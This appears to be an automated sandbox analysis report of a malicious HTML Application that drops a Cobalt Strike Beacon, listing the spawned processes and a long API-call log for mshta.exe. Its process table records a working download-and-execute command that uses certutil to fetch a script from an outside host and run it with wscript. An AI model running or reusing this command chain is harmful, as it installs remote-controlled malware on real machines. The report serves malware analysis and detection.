Cobalt Strike Beacon dropped by HTML Application (HTA) | Sequential Behavior
VTI SCORE: 100/100
Target: win10_64 | html_application
Classification: Trojan, Keylogger, Downloader

d8ef1c4f64a05b1abf100044fcb7048c9526d175a114cb90bd134b80783da146 (SHA256)

Secure_Document_Plugin.hta

HTML Application

Created at 2018-02-15 18:28:00

Notifications (2/3)

Some memory dumps may be missing in the reports since the maximum number of dumps was reached during the analysis. You can increase the limit in the configuration settings.

Some memory dumps may be missing in the reports since the total dump size limit was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "11 minutes, 47 seconds" to "8 minutes, 50 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID
#1 | 0x700 | Analysis Target | High (Elevated) | mshta.exe | "C:\Windows\System32\mshta.exe" "C:\Users\CIIHMN~1\Desktop\SECURE~1.HTA" | -
#2 | 0x32c | RPC Server | System (Elevated) | svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs | #1
#3 | 0xae8 | RPC Server | System (Elevated) | wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | #2
#4 | 0xc40 | Child Process | High (Elevated) | cmd.exe | cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js && wscript.exe C:\Users\Public\en-US.js | #3
#6 | 0xcf4 | Child Process | High (Elevated) | certutil.exe | certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js | #4
#7 | 0x33c | Child Process | High (Elevated) | wscript.exe | wscript.exe C:\Users\Public\en-US.js | #4
#8 | 0xc84 | Child Process | High (Elevated) | explorer.exe | "C:\Windows\SysWOW64\explorer.exe" | #7
#13 | 0xac4 | Child Process | High (Elevated) | rundll32.exe | C:\Windows\syswow64\rundll32.exe | #8

Behavior Information - Sequential View

Process #1: mshta.exe
Information Value
ID #1
File Name c:\windows\system32\mshta.exe
Command Line "C:\Windows\System32\mshta.exe" "C:\Users\CIIHMN~1\Desktop\SECURE~1.HTA"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:27, Reason: Analysis Target
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:10:06
OS Process Information
Information Value
PID 0x700
Parent PID 0x728 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x210, 0xCA4, 0xC9C, 0xCB8, 0xCC0, 0xCBC, 0xCC8, 0xCC4, 0xCD0, 0xCCC, 0x9CC, 0xCF8
Region
For performance reasons, the remaining 9 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
Filename | File Size | Hash Values | YARA Match
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\counters.dat | 0.12 KB | MD5: facb92e802657acec0e601099feda01f, SHA1: a9c28f5f7652f67547a6aed28cf5b749d6a10523, SHA256: e5bf4e0df2157904a32ea3c903931640cabadbe0cd21b5c4ecced2087d4b1d3f | False
Threads
Thread 0x210
Category | Operation | Information | Success | Count
Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 | True | 1
System | Get Info | type = Operating System | True | 1
System | Get Info | type = Operating System | True | 1
Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 | True | 1
Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffb3d280f40 | True | 1
Module | Load | module_name = WLDP.DLL, base_address = 0x7ffb2bea0000 | True | 1
Module | Get Address | module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffb2bea1010 | True | 1
Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | True | 1
Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ | True | 1
Module | Load | module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7ffb223a0000 | True | 1
System | Get Info | type = Hardware Information | True | 1
System | Get Info | type = Operating System | True | 1
Environment | Get Environment String | name = JS_DEBUG_SCOPE | False | 1
Module | Get Handle | module_name = c:\windows\system32\ntdll.dll, base_address = 0x7ffb3d310000 | True | 1
Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = RtlGetDeviceFamilyInfoEnum, address_out = 0x7ffb3d383930 | True | 1
Debug | Check for Presence | c:\windows\system32\mshta.exe | True | 2
Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler | False | 1
Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler | False | 1
Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 | True | 1
System | Get Time | type = Ticks, time = 110406 | True | 2
Module | Load | module_name = ntdll.dll, base_address = 0x7ffb3d310000 | True | 1
Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 | True | 1
Module | Load | module_name = ADVAPI32.dll, base_address = 0x7ffb3c2d0000 | True | 1
Module | Get Address | module_name = c:\windows\system32\advapi32.dll, address_out = 0x7ffb3d31e180 | True | 1
Module | Load | module_name = api-ms-win-downlevel-ole32-l1-1-0.dll, base_address = 0x7ffb3cc70000 | True | 1
Module | Get Address | module_name = c:\windows\system32\combase.dll, address_out = 0x7ffb3cce2340 | True | 1
Module | Load | module_name = urlmon.dll, base_address = 0x7ffb2ea50000 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CoInternetIsFeatureEnabled, address_out = 0x7ffb2ea86410 | True | 1
System | Get Info | type = Operating System | True | 1
Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 | True | 1
System | Get Info | type = Operating System | True | 1
Keyboard | Get Info | type = KB_LOCALE_ID | True | 1
File | Open Mapping | filename = #MSHTML#PERF#00000700, desired_access = FILE_MAP_WRITE | False | 1
Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE, value_name = Path, type = REG_NONE | True | 1
Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 | True | 1
Module | Get Filename | module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 | True | 1
Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility, value_name = mshta.exe, type = REG_NONE | False | 1
Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 | True | 1
Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x7ffb3d2821f0 | True | 1
Module | Get Address | module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x7ffb22da4930 | True | 1
Module | Load | module_name = ole32.dll, base_address = 0x7ffb3cb20000 | True | 1
Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = OleInitialize, address_out = 0x7ffb3cb2ee90 | True | 1
Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 140716610051360 | True | 1
Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 140716610051360 | True | 1
Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 | True | 1
Module | Load | module_name = SHLWAPI.dll, base_address = 0x7ffb3a9f0000 | True | 1
Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveArgsW, address_out = 0x7ffb3a9fbe60 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CreateURLMonikerEx, address_out = 0x7ffb2ea74fe0 | True | 1
Module | Get Address | module_name = c:\windows\system32\combase.dll, function = CoCreateInstance, address_out = 0x7ffb3ccf7000 | True | 1
COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER | True | 1
Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoIncrementMTAUsage, address_out = 0x7ffb3cd38bd0 | True | 1
Window | Create | wndproc_parameter = 0 | True | 1
Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x7ffb3c650000 | True | 1
Module | Get Address | module_name = c:\windows\system32\user32.dll, function = SetCoalescableTimer, address_out = 0x7ffb3c67fdd0 | True | 1
Module | Load | module_name = UxTheme.dll, base_address = 0x7ffb38610000 | True | 1
Module | Get Address | module_name = c:\windows\system32\uxtheme.dll, address_out = 0x7ffb386128c0 | True | 1
System | Get Info | type = Windows Directory, result_out = C:\Windows | True | 1
Module | Load | module_name = comctl32.dll, base_address = 0x7ffb34cc0000 | True | 1
System | Sleep | duration = -1 (infinite) | True | 1
Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 | True | 1
Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 | True | 1
Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 | True | 1
Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 | True | 1
Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu | False | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CoInternetCreateSecurityManager, address_out = 0x7ffb2ea61c00 | True | 1
Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 520, address_out = 0x7ffb2ea6b520 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 444, address_out = 0x7ffb2ea98500 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 521, address_out = 0x7ffb2ea6b870 | True | 1
Module | Get Address | module_name = c:\windows\system32\combase.dll, function = CoTaskMemAlloc, address_out = 0x7ffb3cd20ff0 | True | 1
System | Get Time | type = Ticks, time = 113187 | True | 1
Module | Load | module_name = OLEAUT32.dll, base_address = 0x7ffb3c9b0000 | True | 1
Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x7ffb3ca39910 | True | 1
Module | Load | module_name = api-ms-win-downlevel-shlwapi-l2-1-0.dll, base_address = 0x7ffb3a570000 | True | 1
Module | Get Address | module_name = c:\windows\system32\shcore.dll, function = IUnknown_QueryService, address_out = 0x7ffb3a5a4b50 | True | 1
Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = 29, address_out = 0x7ffb3aa04720 | True | 1
Module | Get Address | module_name = c:\windows\system32\combase.dll, function = CoTaskMemFree, address_out = 0x7ffb3cd21110 | True | 1
Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x7ffb3c9bf120 | True | 1
Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x7ffb3c9c6aa0 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 519, address_out = 0x7ffb2ea6bbc0 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 485, address_out = 0x7ffb2eaa3980 | True | 1
Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 | True | 1
Keyboard | Get Info | type = KB_LOCALE_ID_NAME, result_out = 00000409 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CoInternetGetSession, address_out = 0x7ffb2ea89250 | True | 1
Module | Load | module_name = urlmon.dll, base_address = 0x7ffb2ea50000 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 471, address_out = 0x7ffb2eaa9f00 | True | 1
System | Get Time | type = System Time, time = 2018-02-15 18:29:21 (UTC) | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CoInternetParseIUri, address_out = 0x7ffb2eaab3c0 | True | 1
Module | Get Address | module_name = c:\windows\system32\shcore.dll, function = SHStrDupW, address_out = 0x7ffb3a59cb70 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = CoInternetIsFeatureEnabledForUrl, address_out = 0x7ffb2ea87ed0 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = ReleaseBindInfo, address_out = 0x7ffb2eaab310 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = FindMimeFromData, address_out = 0x7ffb2ea89ec0 | True | 1
Module | Get Address | module_name = c:\windows\system32\urlmon.dll, function = 446, address_out = 0x7ffb2ea9b950 | True | 1
COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD | True | 1
Window | Create | wndproc_parameter = 827497414656 | True | 1
Module | Load | module_name = ext-ms-win-ntuser-touch-hittest-l1-1-0.dll, base_address = 0x7ffb3c650000 | True | 1
Module | Get Address | module_name = c:\windows\system32\user32.dll, function = RegisterTouchHitTestingWindow, address_out = 0x7ffb3c683cc0 | True | 1
Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x7ffb3ca39e60 | True | 1
System | Get Time | type = Ticks, time = 114546 | True | 1
Window | Create | wndproc_parameter = 793105331408 | True | 1
Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40 | True | 1
Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ | True | 1
Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ | True | 1
System | Sleep | duration = 100 milliseconds (0.100 seconds) | True | 1
Module | Load | module_name = OLEACC.DLL, base_address = 0x7ffb2cef0000 | True | 1
Module | Get Address | module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x7ffb2cf003c0 | True | 1
Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 | True | 1
System | Get Cursor | x_out = 1287, y_out = 746 | True | 1
Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 | True | 1
System | Get Cursor | x_out = 1287, y_out = 746 | True | 1
Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 | True | 1
Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 | True | 1
Module | Load | module_name = mshtml.dll, base_address = 0x7ffb223a0000 | True | 2
Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = RegisterDragDrop, address_out = 0x7ffb3cb2e820 | True | 1
System | Sleep | duration = 100 milliseconds (0.100 seconds) | True | 1
COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER | True | 1
System | Get Info | type = Operating System | True | 1
Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 | True | 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
Module Load module_name = amsi.dll, base_address = 0x7ffb30c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30c92260 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffb30c926b0 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x7ffb3c9bdd00 True 1
Fn
System Get Time type = Ticks, time = 115656 True 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID True 1
Fn
Module Load module_name = msls31.dll, base_address = 0x7ffb2dcd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 62, address_out = 0x7ffb2dcf9df0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 63, address_out = 0x7ffb2dcfbce0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 66, address_out = 0x7ffb2dcda350 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 61, address_out = 0x7ffb2dcfdc90 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 71, address_out = 0x7ffb2dcf8aa0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 1, address_out = 0x7ffb2dcda580 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 49, address_out = 0x7ffb2dce22c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 52, address_out = 0x7ffb2dce1ec0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 48, address_out = 0x7ffb2dce2080 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 3, address_out = 0x7ffb2dcdc000 True 1
Fn
Module Load module_name = d2d1.dll, base_address = 0x7ffb355d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\d2d1.dll, function = 1, address_out = 0x7ffb35690a20 True 1
Fn
Module Load module_name = DWrite.dll, base_address = 0x7ffb314d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dwrite.dll, function = DWriteCreateFactory, address_out = 0x7ffb31548d00 True 1
Fn
Module Get Address module_name = c:\windows\system32\dxgi.dll, function = CreateDXGIFactory1, address_out = 0x7ffb37bf6180 True 1
Fn
System Get Time type = Ticks, time = 115828 True 1
Fn
Module Load module_name = d3d11.dll, base_address = 0x7ffb37c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\d3d11.dll, function = D3D11CreateDevice, address_out = 0x7ffb37ca7fa0 True 1
Fn
System Get Time type = Ticks, time = 115921 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\EUDC\1252 False 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 44, address_out = 0x7ffb2dce1c40 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 5, address_out = 0x7ffb2dcdc1d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 513, address_out = 0x7ffb2eae0da0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = ShouldShowIntranetWarningSecband, address_out = 0x7ffb2eaaceb0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Window Set Attribute class_name = HTML Application Host Window Class, index = -16 (GWL_STYLE; the report renders the negative index unsigned as 18446744073709551600), new_long = 0x82CF0000 (rendered as 18446744071609188352) True 1
Fn
Window Set Attribute class_name = HTML Application Host Window Class, index = -20 (GWL_EXSTYLE; rendered unsigned as 18446744073709551596), new_long = 262144 (0x40000, WS_EX_APPWINDOW) True 1
Fn
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x7ffb3c650000 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = IsWindowRedirectedForPrint, address_out = 0x7ffb3c6731d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
COM Get Class ID cls_id = 76A64158-CB41-11D1-8B02-00600806D9B6, prog_id = WbemScripting.SWbemLocator True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffb3c2d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7ffb3c2e8f80 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
